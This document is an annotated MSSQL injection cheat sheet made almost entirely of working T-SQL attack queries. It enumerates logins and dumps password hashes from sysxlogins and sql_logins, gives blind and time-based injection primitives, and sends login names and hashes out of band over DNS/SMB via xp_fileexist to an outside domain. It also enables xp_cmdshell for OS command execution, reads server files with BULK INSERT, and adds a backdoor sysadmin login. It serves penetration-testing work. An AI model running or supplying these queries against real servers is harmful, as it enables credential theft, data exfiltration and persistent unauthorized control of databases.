MSSQL Injection Cheat Sheet

The document contains a series of T-SQL queries that: 1) Return information about the SQL Server instance, databases, logins, and permissions, including the server version, the current user and its server-role membership, login names and password hashes (not plaintext passwords), and the current login's effective permissions. 2) Test and demonstrate SQL functions and operations used as injection building blocks: data type conversions, string manipulation, bitwise tests, time delays for blind injection, and execution of system stored procedures. 3) Potentially expose sensitive information or enable escalated access by executing system stored procedures to read files from the server, exfiltrate data out-of-band over SMB/DNS, execute operating system commands, add or drop logins, and alter server-role membership.

-- Fingerprint the instance and the security context the injected query runs as.
-- Do this first: the rest of the sheet depends on the version (legacy system
-- tables vs. sys.* catalog views) and on what the current login is allowed to do.
SELECT @@VERSION;                    -- product, build, edition and host OS string

-- Minimal statements for confirming that injected SQL is executed at all.
SELECT 1;
SELECT /*comment*/ 1;                -- inline-comment variant, e.g. where whitespace is filtered

-- Who am I?  USER_NAME() / USER give the *database* user; SYSTEM_USER gives the login.
SELECT USER_NAME();
SELECT SYSTEM_USER;
SELECT USER;
SELECT loginame                      -- login that owns the current session
FROM master..sysprocesses
WHERE spid = @@SPID;
-- Enumerate logins and dump their password hashes.
-- master..sysxlogins exists only on SQL Server 2000; sys.sql_logins is the 2005+
-- catalog view. Reading the hash column normally needs elevated rights (sysadmin /
-- CONTROL SERVER) - a NULL hash typically means the current login lacks them.
-- These are hashes, not passwords: they must be cracked offline before reuse.
SELECT name FROM master..syslogins;

-- SQL Server 2000: the raw varbinary hash, then a hex rendering of it.
SELECT name, password FROM master..sysxlogins;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins;

-- SQL Server 2005+: the same, plus a single "name-hash" string that fits in one
-- injected column (useful for UNION- and error-based extraction).
SELECT name, password_hash FROM master.sys.sql_logins;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash)
FROM master.sys.sql_logins;
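-- What can the current login do?  fn_my_permissions() (2005+) lists the effective
-- permissions on a securable: NULL = the current database / the server, or name
-- the object explicitly. The trailing comment on the OBJECT query used an en dash
-- instead of "--" and would not parse; it is a real SQL comment now.
SELECT permission_name FROM master..fn_my_permissions(NULL, 'DATABASE');
SELECT permission_name FROM master..fn_my_permissions(NULL, 'SERVER');
-- permissions on a specific table
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT');
-- permissions held over another principal (here the sa login)
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER');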
-- Fixed-server-role membership of the current login: 1 = member, 0 = not a member,
-- NULL = the role name is not valid. Each query is a one-bit answer, which is
-- exactly what boolean-based blind injection needs.
SELECT IS_SRVROLEMEMBER('sysadmin');        -- full control of the instance
SELECT IS_SRVROLEMEMBER('dbcreator');
SELECT IS_SRVROLEMEMBER('bulkadmin');       -- needed for BULK INSERT file reads
SELECT IS_SRVROLEMEMBER('diskadmin');
SELECT IS_SRVROLEMEMBER('processadmin');
SELECT IS_SRVROLEMEMBER('serveradmin');
SELECT IS_SRVROLEMEMBER('setupadmin');
SELECT IS_SRVROLEMEMBER('securityadmin');   -- can create and alter logins
-- The same questions from the other side: which logins carry each flag / role.
-- syslogins is a compatibility view; every flag column below is a 0/1 bit.
SELECT name FROM master..syslogins WHERE denylogin = 0;        -- not explicitly denied
SELECT name FROM master..syslogins WHERE hasaccess = 1;        -- permitted to connect
SELECT name FROM master..syslogins WHERE isntname = 0;         -- SQL logins, not Windows
SELECT name FROM master..syslogins WHERE isntgroup = 0;        -- not Windows groups
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;

-- Role check for the current login, then for a named login (second argument).
SELECT IS_SRVROLEMEMBER('sysadmin');
SELECT IS_SRVROLEMEMBER('sysadmin', 'sa');
-- Same result as the sysadmin = 1 query above; the quoted '1' is implicitly cast.
SELECT name FROM master..syslogins WHERE sysadmin = '1';
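-- Which database are we in, and what else is on the instance?
SELECT DB_NAME();                          -- current database
SELECT name FROM master..sysdatabases;     -- every database (2000-era view, still present)
-- One-value-at-a-time alternative for blind extraction: DB_NAME(id) for
-- id = 1, 2, 3, ... Returns NULL for an id that is not in use (ids can have gaps).
-- The original placeholder "N" is not valid T-SQL; start at 1 and count up.
SELECT DB_NAME(1);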
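-- Enumerate tables and columns through the legacy sysobjects/syscolumns views
-- (present since 2000, kept as compatibility views). xtype = 'U' is a user table.
-- The columns-and-types query appeared twice verbatim; it is listed once here, and
-- the implicit comma joins are written as explicit INNER JOINs (same result set).

-- Columns of a known table in the current database.
-- NOTE: the subquery errors if more than one object is called 'mytable'
-- (e.g. the same name in two schemas); qualify by schema if that happens.
SELECT c.name
FROM syscolumns AS c
WHERE c.id = (SELECT o.id FROM sysobjects AS o WHERE o.name = 'mytable');

-- Columns and their types for a table in master (swap the database prefix as needed).
SELECT c.name, TYPE_NAME(c.xtype)
FROM master..syscolumns AS c
INNER JOIN master..sysobjects AS o ON o.id = c.id
WHERE o.name = 'sometable';

-- User tables in master, then in any other database by name.
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

-- Hunt for interesting column names across all user tables in the current database.
SELECT o.name AS tablename, c.name AS columnname
FROM sysobjects AS o
INNER JOIN syscolumns AS c ON o.id = c.id
WHERE o.xtype = 'U'
  AND c.name LIKE '%PASSWORD%';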
-- Nth-row trick for blind extraction (no OFFSET on older versions): take the first
-- 9 login names ascending, then the last of those descending = the 9th name.
-- Vary the inner TOP to walk the whole list one row at a time.
SELECT TOP 1 first_rows.name
FROM (
    SELECT TOP 9 name
    FROM master..syslogins
    ORDER BY name ASC
) AS first_rows
ORDER BY first_rows.name DESC;
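-- Building blocks for blind and error-based extraction: substring a value, test
-- single bits, convert between characters and ASCII codes, and force conversion
-- errors. The hex literal below was mangled to "0×41" (multiplication sign) in the
-- source; T-SQL hex literals are written 0x41.
SELECT SUBSTRING('abcd', 3, 1);             -- 'c' : positions are 1-based
SELECT 6 & 2;                                -- 2 : bitwise AND extracts one bit at a time
SELECT 6 & 1;                                -- 0
SELECT CHAR(0x41);                           -- 'A' : 0x41 is a hex literal
SELECT ASCII('A');                           -- 65
SELECT CAST('1' AS INT);                     -- succeeds; CAST of non-numeric text raises a
                                             -- conversion error - the error-based channel
SELECT CAST(1 AS CHAR);                      -- '1'
SELECT 'A' + 'B';                            -- 'AB' : + concatenates strings in T-SQL
SELECT CHAR(65) + CHAR(66);                  -- 'AB' built without any quote characters

-- Conditionals for boolean-based injection.
IF (1=1) SELECT 1 ELSE SELECT 2;
SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END;

-- Time-based blind: a 5-second pause is observable even when nothing is echoed.
WAITFOR DELAY '0:0:5';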
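-- Out-of-band exfiltration over SMB/DNS. Each statement builds a UNC path whose host
-- part carries the data, then asks SQL Server to touch that path; the server resolves
-- (DNS) and connects to (SMB) a host you control, so the value lands in your logs even
-- when nothing is echoed back. Needs the xp_ procedures to be callable by the current
-- login and outbound DNS/SMB from the database host; xp_getfiledetails is an
-- undocumented 2000-era procedure and may be absent on newer versions.
--
-- Quoting: inside EXEC('...') each embedded single quote is doubled ('') and the
-- UNC prefix \\ is written literally. The source had these collapsed into smart
-- quotes and single backslashes, which does not parse.
DECLARE @host varchar(800);

-- Leak one login name via the host part of \\<name>\c$\boot.ini.
-- SELECT @var = col over several rows keeps only the last row; use TOP 1 / a loop
-- to pick specific rows.
SELECT @host = name FROM master..syslogins;
EXEC('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini''');

-- Leak "name-passwordhash" as a DNS name under a domain you control. Replace
-- 2.pentestmonkey.net with your own logging domain. A single DNS label is limited to
-- 63 characters, so a long hex hash may need to be split across several labels.
SELECT @host = name + '-' + master.sys.fn_varbintohexstr(password_hash)
    + '.2.pentestmonkey.net'
FROM sys.sql_logins;
EXEC('xp_fileexist ''\\' + @host + '\c$\boot.ini''');

-- Also check out the DNS tunnel feature of sqlninja.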
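-- OS command execution through xp_cmdshell. It is disabled by default on 2005+ and
-- enabling it requires sysadmin (ALTER SETTINGS); commands run as the SQL Server
-- service account (or the xp_cmdshell proxy account for non-sysadmin callers).
-- The source ran the command before enabling it; the order below is the one that works.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

EXEC xp_cmdshell 'net user';             -- proof of execution: lists local accounts

-- Put the setting back when done; leaving xp_cmdshell enabled is a finding in itself.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;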
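-- Read a file from the database host into a scratch table (one row per line), query
-- it, then drop the table so the read leaves nothing behind in the schema.
-- BULK INSERT reads as the SQL Server service account and needs the bulkadmin role
-- (ADMINISTER BULK OPERATIONS); the path is on the server, not the client.
-- The source path 'c:boot.ini' had lost its backslash.
CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:\boot.ini';
SELECT line FROM mydata;
DROP TABLE mydata;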
-- NB: HOST_NAME() is the *client* workstation name for this session, not the
-- database server; use @@SERVERNAME for the server.
SELECT HOST_NAME()
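-- Create a login and promote it to sysadmin (persistence / a backdoor account).
-- Roughly: securityadmin can add logins, only sysadmin can grant sysadmin.
-- These procedures are deprecated; CREATE LOGIN / DROP LOGIN (2005+) and
-- ALTER SERVER ROLE ... ADD MEMBER (2012+) are the supported forms.
-- Use a strong, unique password - a weak backdoor credential is an exposure you
-- created on the client's system - and remove the login when the engagement ends.
-- The sp_addsrvrolemember line was missing its closing quote in the source.
EXEC sp_addlogin 'user', 'pass';
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin';
-- Cleanup.
EXEC sp_droplogin 'user';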
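-- Database details (owner, size, files, options) for a named database.
EXEC sp_helpdb master;
EXEC sp_helpdb pubs;

-- Default / system databases to expect. The bare names below were listed as plain
-- words in the source (not valid T-SQL); they are kept here as a comment.
-- master, model, msdb and tempdb are always present; northwind and pubs are sample
-- databases and their presence hints at how the instance was installed.
--   northwind
--   model
--   msdb
--   pubs
--   tempdb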
